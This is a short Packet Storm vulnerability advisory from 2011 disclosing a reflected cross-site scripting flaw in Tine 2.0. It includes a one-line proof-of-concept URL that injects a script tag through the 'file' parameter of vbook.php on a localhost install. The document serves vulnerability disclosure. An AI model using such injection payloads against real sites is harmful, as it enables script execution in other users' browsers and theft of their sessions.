Tine 2.0 Cross Site Scripting

2011-05-03T00:00:00
ID PACKETSTORM:101057
Type packetstorm
Reporter AutoSec Tools
Modified 2011-05-03T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Tine 2.0  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://www.tine20.org/  
Discovery Date..........4/30/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in Tine 2.0 can be  
exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/tine/library/vcardphp/vbook.php?file=<script>alert(0)</script>  
`